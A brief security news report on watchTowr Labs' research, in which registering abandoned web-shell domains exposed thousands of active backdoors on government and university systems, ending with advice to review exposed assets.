
Researchers at watchTowr Labs discovered more than 4,000 active backdoors on compromised systems of governments and universities around the world, using abandoned domains and abandoned infrastructure.
The watchTowr Labs team conducted extensive research focusing on the use of abandoned domains that were part of backdoors on hackers’ systems. The idea was to take control of abandoned backdoors through which hackers gained access to compromised systems. For this, the researchers registered more than 40 abandoned domains that were used in old web shells to communicate with attackers.
After registering domains and redirecting traffic to their servers, the researchers discovered more than 4,000 active backdoors on various systems, including:
In addition, the team obtained data on the use of old popular web shells such as r57shell and c99shell, which had built-in backdoors to “control hackers by hackers”. The identified backdoors allowed to observe how the hackers infect the systems on their own, and also made it possible to gain access to these systems with minimal effort.
A similar technique has been used before, when the watchTowr team conducted research on domain swapping for .MOBI domains, which allowed them to obtain trusted TLS/SSL certificates. This led to global changes in approaches to issuing certificates initiated by Google.
Webshells such as r57shell and c99shell have historically been widely used by hackers and cybercriminals for follow-up attacks after the initial breach of servers. They often had hidden backdoors that allowed web shell writers to gain access to compromised systems even if the original hacker had password-protected the backdoor.
The watchTowr Labs study highlights the dangers of abandoned infrastructure and abandoned domains that can be used to control compromised systems. The company encourages organizations to regularly review their assets and ensure their security.